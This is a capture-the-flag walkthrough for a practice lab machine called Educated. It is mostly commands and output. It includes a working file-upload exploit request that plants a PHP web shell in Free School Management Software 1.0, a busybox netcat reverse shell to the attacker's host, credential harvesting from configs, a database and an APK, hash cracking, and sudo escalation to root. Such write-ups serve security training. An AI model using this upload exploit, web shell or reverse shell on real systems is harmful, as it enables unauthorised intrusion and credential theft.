Summary #
On port 80 there is a website called WISDOM ELEMENTARY SCHOOL, running gobuster we find a login page with a Gosfem Community Edition title. There is an RCE exploit for the Free School Management Software 1.0. Once we have initial access as the www-data user, we find MySQL credentials and a password hash in the database. Cracking the password with CrackStation we can move laterally to the msander user. There is an APK file we download and analyze using the Mobile Security Framework (MobSF) and find hardcoded credentials for the emiller. Switching to this user and checking sudo privileges, allows us to run all commands with sudo, allowing us to escalate our privileges to the root user, using the bash binary.
Specifications #
- Name: EDUCATED
- Platform: PG PRACTICE
- Points: 20
- Difficulty: Intermediate
- System overview: Linux school 5.4.0-146-generic #163-Ubuntu SMP Fri Mar 17 18:26:02 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.233.13
- OFFSEC provided credentials: None
- HASH:
local.txt:739361ebf29e15238fab657b03c1e063 - HASH:
proof.txt:602bc027787f7618c7ca5ff6411a2dc5
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir educated && cd educated && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Sep 8 18:36 .
drwxrwxr-x 59 kali kali 4096 Sep 8 18:36 ..
drwxrwxr-x 2 kali kali 4096 Sep 8 18:36 enum
drwxrwxr-x 2 kali kali 4096 Sep 8 18:36 exploits
drwxrwxr-x 2 kali kali 4096 Sep 8 18:36 files
drwxrwxr-x 2 kali kali 4096 Sep 8 18:36 tools
drwxrwxr-x 2 kali kali 4096 Sep 8 18:36 uploads
## set bash variable
ip=192.168.233.13
## ping target to check if it's online
ping $ip
PING 192.168.233.13 (192.168.233.13) 56(84) bytes of data.
64 bytes from 192.168.233.13: icmp_seq=1 ttl=61 time=18.0 ms
64 bytes from 192.168.233.13: icmp_seq=2 ttl=61 time=17.4 ms
^C
--- 192.168.233.13 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 17.386/17.715/18.045/0.329 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.233.13:22
Open 192.168.233.13:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-08 18:37 CEST
Initiating Ping Scan at 18:37
Scanning 192.168.233.13 [4 ports]
Completed Ping Scan at 18:37, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:37
Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:37
Scanning 192.168.233.13 [2 ports]
Discovered open port 80/tcp on 192.168.233.13
Discovered open port 22/tcp on 192.168.233.13
Completed SYN Stealth Scan at 18:37, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.233.13
Host is up, received echo-reply ttl 61 (0.018s latency).
Scanned at 2025-09-08 18:37:27 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmPOfERLKCxx+ufQz7eRTNuEEkJ+GX/hKPNPpCWlTiTgegmjYoXQ7MA5ibTRoJ6vxpPEggzNszJKbBrSVAbRuT2sBg4o7ywiGUy7vsDBpObMrBMsdKuue3gpkaNF8DL2pB3v/XAxtavq1Mh4vz4yj99cc2pX1GhSjpQTWlsK8Rl9DmBKp7t0XxEWwq3juQ9JiN5yAttMrbTDjwMNxcipsYv0pMudDBE6g4gQyiZGwuUfBn+HirxnfRr7KkxmBaEpZgukXSJ7fXYgpQVgNP2cvd2sy/PYe0kL7lOfYwG/DSLWV917RPIdsPPQYr+rqrBL7XQA2Qll30Ms9iAX1m9S6pT/vkaw6JQCgDwFSwPXrknf627jCS7vQ8mh8UL07nPO7Hkko3fnHIcxyJggi/BoAAi3GseOl7vCZl28+waWlNdbR8gaiZhDR1rLvimcm3pg3nv9m+0qfVRIs9fxq97cOEFeXhaGHXvQL6LYGK14ZG+jVXtPavID6txymiBOUsj8M=
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAweAzke7+zPt3Untb06RlI4MEp+vsEJICUG+0GgPMp+vxOdxEhcsVY0VGyuC+plTRlqNi0zNv1Y0Jj0BYRMSUw=
| 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPJP5z2Scxa02tfhI1SClflg5QtVdhMImHwY7GugVtfY
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Wisdom Elementary School
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Wisdom Elementary School
On port 80 there is a website called WISDOM ELEMENTARY SCHOOL, but this doesn’t have functionality to abuse.
So let’s run a gobuster to see if we can find any directories.
## use `gobuster` to find directories
gobuster dir -t 100 -u http://$ip:80/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.233.13:80/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 317] [--> http://192.168.233.13/assets/]
/management (Status: 301) [Size: 321] [--> http://192.168.233.13/management/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.233.13/vendor/]
/server-status (Status: 403) [Size: 279]
===============================================================
Finished
===============================================================
When we browse to the management directory (http://192.168.233.13/management/) we see a login page with a title of: Gosfem Community Edition.
Searching the internet we can find: https://www.exploit-db.com/exploits/50587, this is an RCE exploit for the Free School Management Software 1.0. Now, let’s start BURP, browse to http://192.168.233.13/management/ and in BURP send the request to repeater. Change the content of the exploit to match our context. When we click Send we get a HTTP/1.1 200 OK. So, the cmd.php is uploaded.
## copy / paste content below to send POST request to target
POST /management/admin/examQuestion/create HTTP/1.1
Host: 192.168.233.13
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------183813756938980137172117669544
Content-Length: 1335
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="name"
test4
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="class_id"
2
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="subject_id"
5
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="timestamp"
2021-12-08
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="teacher_id"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_type"
txt
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="status"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="description"
123123
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="_wysihtml5_mode"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_name"; filename="cmd.php"
Content-Type: application/octet-stream
<?php system($_REQUEST["cmd"]); ?>
-----------------------------183813756938980137172117669544--
Visiting the URL: (http://192.168.233.13/management/uploads/exam_question/cmd.php?cmd=id), will get us the ID of the user, namely www-data.
Let’s get a reverse shell, after setting up a listener, sending a request to this URL: (http://192.168.233.13/management/uploads/exam_question/cmd.php?cmd=busybox+nc+192.168.45.243+80+-e+bash). This gives initial access as the www-data user in the /var/www/html/management/uploads/exam_question directory. Unfortunately, we cannot read the local.txt.
## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.243/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::2842:4cf9:efb:45dd/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## setup a listener
nc -lvnp 9001
listening on [any] 9001 ...
## catch the reverse shell
nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.233.13] 42894
## print current user
whoami
www-data
## print the current working directory
pwd
/var/www/html/management/uploads/exam_question
## find `local.txt` on the filesystem
find / -iname 'local.txt' 2>/dev/null
/home/msander/local.txt
## list `/home/msander/local.txt`
ls -la /home/msander/local.txt
-rw------- 1 msander msander 33 Sep 8 16:36 /home/msander/local.txt
Lateral Movement #
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
www-data@school:/var/www/html/management/uploads/exam_question$ export TERM=xterm && stty columns 200 rows 200
Searching the /var/www/html/management directory for credentials, gives us MySQL credentials of: school:@jCma4s8ZM<?kA. Using these credentials we can indeed log into MySQL and get a password hash from the Testing Teacher user.
## change directory
www-data@school:/var/www/html/management/uploads/exam_question$ cd /var/www/html/management/
www-data@school:/var/www/html/management$
## find all file containing `datab` and grep for `pass`
www-data@school:/var/www/html/management$ find . -iname '*datab*' 2>/dev/null | xargs grep -A5 -B5 -i 'pass' 2>/dev/null
<SNIP>
./application/config/database.php- 'hostname' => 'localhost',
./application/config/database.php- 'username' => 'school',
./application/config/database.php: 'password' => '@jCma4s8ZM<?kA',
./application/config/database.php- 'database' => 'school_mgment',
./application/config/database.php- 'dbdriver' => 'mysqli',
<SNIP>
## use credentials to log into MySQL: `school:@jCma4s8ZM<?kA`
www-data@school:/var/www/html/management$ mysql -u school -p -h 127.0.0.1 -P 3306
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 22
Server version: 8.0.32-0ubuntu0.20.04.2 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
## show all databases
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| school_mgment |
| sys |
+--------------------+
5 rows in set (0.00 sec)
## switch to database `school_mgment`
mysql> use school_mgment;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
## show all tables
mysql> show tables;
+-------------------------+
| Tables_in_school_mgment |
+-------------------------+
| academic_syllabus |
| activity |
| admin |
| admin_role |
| assignment |
| attendance |
| bank |
| book |
| book_category |
| ci_sessions |
| circular |
| class |
| club |
| department |
| designation |
| dormitory |
| enquiry |
| enquiry_category |
| exam |
| exam_question |
| expense_category |
| hostel_category |
| hostel_room |
| house |
| invoice |
| language |
| language_list |
| leave |
| mark |
| material |
| noticeboard |
| parent |
| payment |
| section |
| settings |
| sms_settings |
| social_category |
| student |
| student_category |
| subject |
| teacher |
| transport |
| transport_route |
| vehicle |
+-------------------------+
44 rows in set (0.00 sec)
## describe the `teacher` table
mysql> describe teacher;
+-----------------+----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+----------+------+-----+---------+----------------+
| teacher_id | int | NO | PRI | NULL | auto_increment |
| name | longtext | NO | | NULL | |
| role | longtext | NO | | NULL | |
| teacher_number | longtext | NO | | NULL | |
| birthday | longtext | NO | | NULL | |
| sex | longtext | NO | | NULL | |
| religion | longtext | NO | | NULL | |
| blood_group | longtext | NO | | NULL | |
| address | longtext | NO | | NULL | |
| phone | longtext | NO | | NULL | |
| email | longtext | NO | | NULL | |
| facebook | longtext | NO | | NULL | |
| twitter | longtext | NO | | NULL | |
| googleplus | longtext | NO | | NULL | |
| linkedin | longtext | NO | | NULL | |
| qualification | longtext | NO | | NULL | |
| marital_status | longtext | NO | | NULL | |
| file_name | longtext | NO | | NULL | |
| password | longtext | NO | | NULL | |
| department_id | int | NO | | NULL | |
| designation_id | int | NO | | NULL | |
| date_of_joining | longtext | NO | | NULL | |
| joining_salary | longtext | NO | | NULL | |
| status | int | NO | | NULL | |
| date_of_leaving | longtext | NO | | NULL | |
| bank_id | int | NO | | NULL | |
| login_status | longtext | NO | | NULL | |
+-----------------+----------+------+-----+---------+----------------+
27 rows in set (0.01 sec)
## print `name` and `password` from the `teacher` table
mysql> select name, password from teacher;
+-----------------+------------------------------------------+
| name | password |
+-----------------+------------------------------------------+
| Testing Teacher | 3db12170ff3e811db10a76eadd9e9986e3c1a5b7 |
+-----------------+------------------------------------------+
1 row in set (0.00 sec)
When we enter the password hash in CrackStation (https://crackstation.net/), we get greatteacher123 as a result.
Testing the password for password reuse on all users with a shell, allows us to move laterally to the msander user. Credentials: msander:greatteacher123.
## switch user to `msander`
www-data@school:/var/www/html/management$ su msander
Password:
msander@school:/var/www/html/management$
## change directory
msander@school:/var/www/html/management$ cd /home/msander/
msander@school:~$
## print `local.txt`
msander@school:~$ cat local.txt
739361ebf29e15238fab657b03c1e063
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.243/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::2842:4cf9:efb:45dd/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
## on target
## download `linpeas.sh`
msander@school:~$ wget http://192.168.45.243/linpeas.sh
--2025-09-08 18:39:29-- http://192.168.45.243/linpeas.sh
Connecting to 192.168.45.243:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 961834 (939K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 0%[ linpeas.sh 100%[=============================================================================================================>] 939.29K 4.74MB/s in 0.2s
2025-09-08 18:39:30 (4.74 MB/s) - ‘linpeas.sh’ saved [961834/961834]
## set the execution bit
msander@school:~$ chmod +x linpeas.sh
## run `linpeas.sh`
msander@school:~$ ./linpeas.sh
The linpeas.sh output shows there is an APK file in the home directory of the emiller user: /home/emiller/development/grade-app.apk. Download the APK file locally, check md5sums to verify they are the same file and analyze it with the Mobile Security Framework (MobSF) (https://github.com/MobSF/Mobile-Security-Framework-MobSF).
## search for readable files
msander@school:~$ find / -type f -readable 2>/dev/null | egrep -v '^(/proc|/sys|/snap|/boot|/var|/run|/dev|/opt|/etc|/usr/)'
/home/emiller/.bashrc
/home/emiller/.bash_logout
/home/emiller/development/grade-app.apk
/home/emiller/.profile
/home/msander/snap/lxd/common/config/config.yml
/home/msander/linpeas.sh
/home/msander/.bashrc
/home/msander/.bash_logout
/home/msander/local.txt
/home/msander/.gnupg/trustdb.gpg
/home/msander/.gnupg/pubring.kbx
/home/msander/.profile
## change directory
cd files
## setup a listener and redirect to `grade-app.apk `
nc -lp 9001 > grade-app.apk
## on target:
## send `/home/emiller/development/grade-app.apk` using nc
msander@school:~$ nc -w 3 192.168.45.243 9001 < /home/emiller/development/grade-app.apk
## calculate md5sum on `/home/emiller/development/grade-app.apk`
msander@school:~$ md5sum /home/emiller/development/grade-app.apk
d44812e29f14f1dcdf0160062c84df0c /home/emiller/development/grade-app.apk
## locally:
## calculate md5sum on `grade-app.apk`
md5sum grade-app.apk
d44812e29f14f1dcdf0160062c84df0c grade-app.apk
## download docker mobsf
docker pull opensecurity/mobile-security-framework-mobsf:latest
## run docker mobsf
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
Visiting port 8000 on localhost: (http://localhost:8000/login/) requires to log into the MobSF application. The default credentials are: mobsf:mobsf.
Once logged in the MobSF application we upload the APK file and let it analyze it. Scrolling down to the Possible hardcoded secrets we see a username and password: e.miller:EzPwz2022_dev1$$23!!
These credentials (e.miller:EzPwz2022_dev1$$23!!) allows us to switch to the emiller user.
## switch to the `emiller` user
msander@school:~$ su emiller
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
Privilege Escalation #
Once switched, we check our sudo privileges and see we can run any command with sudo, so let’s escalate our privileges to the root user using the bash binary.
## check sudo privileges
emiller@school:/home/msander$ sudo -l
[sudo] password for emiller:
Matching Defaults entries for emiller on school:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User emiller may run the following commands on school:
(ALL : ALL) ALL
## escalate privileges using the `bash` binary
emiller@school:/home/msander$ sudo bash -p
root@school:/home/msander#
## print `proof.txt`
root@school:/home/msander# cat /root/proof.txt
602bc027787f7618c7ca5ff6411a2dc5
References #
[+] https://www.exploit-db.com/exploits/50587
[+] https://crackstation.net/
[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
[+] https://github.com/MobSF/Mobile-Security-Framework-MobSF